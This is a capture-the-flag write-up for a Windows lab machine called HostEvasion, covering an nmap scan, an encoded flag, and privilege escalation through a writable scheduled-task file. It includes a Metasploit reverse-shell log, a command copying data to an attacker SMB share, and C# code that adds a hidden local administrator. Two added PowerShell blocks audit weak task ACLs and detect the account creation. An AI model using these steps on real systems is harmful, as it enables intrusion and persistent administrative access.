Initial access

We start by running an nmap scan to identify open ports on the target machine.

Nmap scan report for 10.10.145.204
Host is up (0.068s latency).
Not shown: 994 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
3389/tcp open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2025-06-26T14:08:53+00:00; +1s from scanner time.
| rdp-ntlm-info:
|   Target_Name: HOSTEVASION
|   NetBIOS_Domain_Name: HOSTEVASION
|   NetBIOS_Computer_Name: HOSTEVASION
|   DNS_Domain_Name: HostEvasion
|   DNS_Computer_Name: HostEvasion
|   Product_Version: 10.0.17763
|_  System_Time: 2025-06-26T14:08:13+00:00
| ssl-cert: Subject: commonName=HostEvasion
| Not valid before: 2025-06-25T14:03:17
|_Not valid after:  2025-12-25T14:03:17
8000/tcp open  http          PHP cli server 5.5 or later
|_http-title: 404 Not Found
8080/tcp open  http          Apache httpd 2.4.56 ((Win64) OpenSSL/1.1.1t PHP/8.0.28)
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: PowerShell Script Analyser
8443/tcp open  ssl/http      Apache httpd 2.4.56 ((Win64) OpenSSL/1.1.1t PHP/8.0.28)
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
| tls-alpn:
|_  http/1.1
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after:  2019-11-08T23:48:47
|_http-title: PowerShell Script Analyser
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1s, deviation: 0s, median: 1s
| smb2-time:
|   date: 2025-06-26T14:08:14
|_  start_date: N/A
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 74.37 seconds

The scan shows that the server hosts a web site, titled "PowerShell Script Analyser", that analyses PowerShell scripts supplied to it.

Uploading a PowerShell script that spawns a reverse shell therefore gives direct remote access to the machine.

Encoded user flag

An attempt to retrieve the user flag reveals that it contains a base64 encoded string.

cat encodedflag
-----BEGIN CERTIFICATE-----
WW91IGNhbiBnZXQgdGhlIGZsYWcgYnkgdmlzaXRpbmcgdGhlIGxpbmsgaHR0cDov
LzxJUF9PRl9USElTX1BDPjo4MDAwL2FzZGFzZGFkYXNkamFramRuc2Rmc2Rmcy5w
aHA=
-----END CERTIFICATE-----

Decoding the file reveals the existence of a hidden endpoint on the website.

┌──(kali㉿kali)-[~/ctf/thm]
└─$ echo -n "WW91IGNhbiBnZXQgdGhlIGZsYWcgYnkgdmlzaXRpbmcgdGhlIGxpbmsgaHR0cDovLzxJUF9PRl9USElTX1BDPjo4MDAwL2FzZGFzZGFkYXNkamFramRuc2Rmc2Rmcy5waHA=" | base64 -d
You can get the flag by visiting the link http://<IP_OF_THIS_PC>:8000/asdasdadasdjakjdnsdfsdfs.php

Visiting that page, we learn that the log files must be deleted before the flag is returned.

By browsing the machine and reading the script that processes the uploaded files, we find that the logs are stored in the following directory:

C:\xampp\htdocs\uploads

By deleting them and returning to the web page, we can retrieve the flag.

Modification of a scheduled task

To fully compromise the machine, I started by enumerating its configuration with PrivescCheck, whose HTML report I copied off the machine like this:

New-PSDrive -Name Z -PSProvider FileSystem -Root "\\10.21.110.163\share" -Credential (New-Object PSCredential('test', (ConvertTo-SecureString 'test' -AsPlainText -Force)))

Copy-Item PrivescCheck_HOSTEVASION.html -Destination "Z:\"


The report shows that we have write access to a directory containing a file that is executed by a scheduled task.
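The same misconfiguration can be found from the administrator's side. The following PowerShell snippet is an added example, not code from the original write-up: it lists enabled scheduled tasks whose executable, script argument, or parent directory grants write rights to low-privilege principals. It assumes an English locale for the built-in group names.

```powershell
# Added example (not from the original write-up): flag scheduled tasks whose
# target file, or the directory holding it, is writable by low-privilege
# principals. Group names assume an English locale.
$weakPrincipals = @('BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'Everyone')
$writeMask = [System.Security.AccessControl.FileSystemRights]::Write -bor
             [System.Security.AccessControl.FileSystemRights]::Modify -bor
             [System.Security.AccessControl.FileSystemRights]::FullControl

function Test-WeakWriteAcl {
    param([string]$Path)
    if (-not $Path -or -not (Test-Path -LiteralPath $Path)) { return $null }
    foreach ($ace in (Get-Acl -LiteralPath $Path).Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($weakPrincipals -notcontains $ace.IdentityReference.Value) { continue }
        if (($ace.FileSystemRights -band $writeMask) -ne 0) { return $ace.IdentityReference.Value }
    }
    return $null
}

foreach ($task in Get-ScheduledTask | Where-Object { $_.State -ne 'Disabled' }) {
    foreach ($action in $task.Actions) {
        if (-not $action.Execute) { continue }   # COM-handler actions have no Execute
        # Strip quotes and expand variables such as %SystemRoot%
        $exe = [Environment]::ExpandEnvironmentVariables($action.Execute.Trim('"'))
        # A task that runs an interpreter (cmd, powershell) takes its real
        # target from the arguments, so pull any absolute paths out of them too
        $targets = @($exe)
        if ($action.Arguments) {
            $targets += [regex]::Matches($action.Arguments, '[A-Za-z]:\\[^"\s]+') |
                        ForEach-Object { $_.Value }
        }
        foreach ($t in $targets) {
            foreach ($p in @($t, (Split-Path -Path $t -Parent))) {
                $who = Test-WeakWriteAcl -Path $p
                if ($who) {
                    [pscustomobject]@{
                        Task      = $task.TaskPath + $task.TaskName
                        RunsAs    = $task.Principal.UserId
                        Writable  = $p
                        GrantedTo = $who
                    }
                }
            }
        }
    }
}
```

Any row where RunsAs is SYSTEM or an administrator and Writable is a path a standard user can modify is the privilege-escalation path described above; tighten the ACL on that path or move the task's script to a protected directory.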

If you replace the script with a reverse shell, you won’t be able to stabilize the connection because of the antivirus.

msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.21.110.163:4444
[*] Command shell session 2 opened (10.21.110.163:4444 -> 10.10.204.232:50051) at 2025-06-27 18:17:44 -0400

schtasks /run /tn \MyTHMTask
SUCCESS: Attempted to run the scheduled task "\MyTHMTask".

To get around this problem, you can write a C# program that creates a new user on the machine and adds it to the local administrators group.

using System;
using System.IO;
using System.Diagnostics;

namespace AddUser
{
    class Program
    {
        static void Main(string[] args)
        {
            try
            {
                // Batch file and log written next to the XAMPP install.
                // Verbatim strings (@"...") keep the backslashes literal; in a
                // regular string "\x" and "\a" would be parsed as escape sequences.
                string batPath = @"C:\xampp\adduser.bat";
                string logPath = @"C:\xampp\adduser.log";

                // Batch content: every command appends its output to the log,
                // and "\r\n" gives cmd.exe the line endings it expects.
                string batContent =
                    "@echo off\r\n" +
                    "echo --- START ADDUSER --- >> " + logPath + "\r\n" +
                    "net user chemse P@ssw0rd123 /add >> " + logPath + " 2>&1\r\n" +
                    "net localgroup administrators chemse /add >> " + logPath + " 2>&1\r\n" +
                    "echo --- END ADDUSER --- >> " + logPath + "\r\n";

                // Write batch file
                File.WriteAllText(batPath, batContent);

                // Execute batch file
                Process.Start("cmd.exe", "/c " + batPath);
            }
            catch (Exception ex)
            {
                Console.WriteLine("Error : " + ex.Message);
            }
        }
    }
}

Once compiled to an exe and run by the scheduled task, this program created the account and added it to the machine's local administrators group, fully compromising it.

net users

User accounts for \\HOSTEVASION

-------------------------------------------------------------------------------
Administrator            chemse                   DefaultAccount
evader                   Guest                    WDAGUtilityAccount
The command completed successfully.
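The trail this leaves in the Security log is a 4720 (user account created) followed shortly by a 4732 (member added to a security-enabled local group) for the Administrators group. The PowerShell snippet below is an added detection example, not code from the original write-up: it correlates the two events by SID and reports accounts that were created and then added to local Administrators. It assumes an elevated prompt and that account-management auditing is enabled.

```powershell
# Added example (not from the original write-up): correlate Security events
# 4720 (user account created) and 4732 (member added to a security-enabled
# local group) to surface accounts created and then added to Administrators.
# Requires an elevated prompt to read the Security log.
function Get-EventDataField {
    param([System.Diagnostics.Eventing.Reader.EventRecord]$Event, [string]$Name)
    $xml = [xml]$Event.ToXml()
    ($xml.Event.EventData.Data | Where-Object { $_.Name -eq $Name }).'#text'
}

$since  = (Get-Date).AddDays(-7)
$events = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4720, 4732; StartTime = $since } `
                       -ErrorAction SilentlyContinue

# Accounts created, keyed by SID so a later rename does not break the match
$created = @{}
foreach ($e in $events | Where-Object Id -eq 4720) {
    $sid = Get-EventDataField $e 'TargetSid'
    if ($sid) {
        $created[$sid] = [pscustomobject]@{
            User      = Get-EventDataField $e 'TargetUserName'
            CreatedAt = $e.TimeCreated
            CreatedBy = Get-EventDataField $e 'SubjectUserName'
        }
    }
}

# S-1-5-32-544 is the well-known SID of the local Administrators group, so
# the check does not depend on the group's localized display name.
foreach ($e in $events | Where-Object Id -eq 4732) {
    if ((Get-EventDataField $e 'TargetSid') -ne 'S-1-5-32-544') { continue }
    $memberSid = Get-EventDataField $e 'MemberSid'
    if (-not $memberSid) { continue }
    $hit = $created[$memberSid]
    if ($hit) {
        [pscustomobject]@{
            User          = $hit.User
            CreatedAt     = $hit.CreatedAt
            AddedToAdmins = $e.TimeCreated
            GapSeconds    = [int]($e.TimeCreated - $hit.CreatedAt).TotalSeconds
            Actor         = Get-EventDataField $e 'SubjectUserName'
        }
    }
}
```

A small GapSeconds value with Actor set to SYSTEM or a service account, rather than a known administrator, is the pattern produced by a scheduled task running the program above.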